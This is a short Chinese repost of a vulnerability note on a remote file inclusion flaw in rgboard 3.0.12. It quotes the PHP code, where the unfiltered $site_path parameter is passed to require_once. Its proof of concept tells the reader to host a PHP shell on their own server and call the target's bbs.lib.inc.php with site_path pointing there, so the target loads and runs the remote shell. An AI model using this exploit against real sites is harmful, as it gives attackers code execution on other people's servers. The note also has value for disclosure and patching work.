rgboard 3.0.12 远程文件包含漏洞

当前位置 : 首页 > 实用技巧 > 漏洞研究 > rgboard 3.0.12 远程文件包含漏洞

rgboard 3.0.12 远程文件包含漏洞

来源:互联网 作者:脚本宝典 时间:2015-07-26 18:46
vulcode: \include\bbs.lib.inc.php: if(!defined(BBS_LIB_INC_INCLUDED)){ define(BBS_LIB_INC_INCLUDED,1); //*–BBS_LIB_INC_INCLUDEDSTART–* if(!$site_path)$site_path=./; require_once“{$site_path}include/lib.inc.php”; //$site_path没有过

vul code: 
\include\bbs.lib.inc.php: 
if (!defined('BBS_LIB_INC_INCLUDED')) { 
define('BBS_LIB_INC_INCLUDED', 1); 
// *– BBS_LIB_INC_INCLUDED START –* 
if(!$site_path) $site_path='./'; 
require_once “{$site_path}include/lib.inc.php”; 
//$site_path没有过滤直接放过来包含了 
poc: 
在你的网站放个phpshell,目录和文件名为/include/lib.inc.php 
然后访问 
httP://www.target.com/include/bbs.lib.inc.php?site_path=http://yousite/ 

Tag:
网友评论

<